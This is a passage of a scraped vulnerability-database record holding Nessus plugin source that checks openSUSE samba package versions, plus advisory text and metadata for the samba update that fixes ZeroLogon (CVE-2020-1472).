rpm_check(release:\"SUSE15.1\", reference:\"samba-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-ad-dc-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-ad-dc-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-client-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-client-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-core-devel-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-debugsource-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-dsdb-modules-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-dsdb-modules-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python3-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-libs-python3-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-pidl-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python3-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-python3-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-test-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-test-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-winbind-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"samba-winbind-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libnetapi-devel-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ceph-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-client-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-pcp-pmda / ctdb-pcp-pmda-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:23:58", "description": "This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n - Update to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes = CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for schema mode fatal; (bso#14425);\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update project.", "cvss3": {}, "published": "2020-09-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : samba (openSUSE-2020-1526)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-python3", "p-cpe:/a:novell:opensuse:samba-python3-debuginfo", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsmbldap2", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:samba-ad-dc", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo", "p-cpe:/a:novell:opensuse:samba-ceph", "p-cpe:/a:novell:opensuse:samba-ceph-debuginfo", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:samba-dsdb-modules", "p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs"], "id": "OPENSUSE-2020-1526.NASL", "href": "https://www.tenable.com/plugins/nessus/141072", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1526.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141072);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2020-1526)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n - Update to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows\n server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes =\n CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known\n NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to\n MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of\n pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for\n schema mode fatal; (bso#14425);\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", 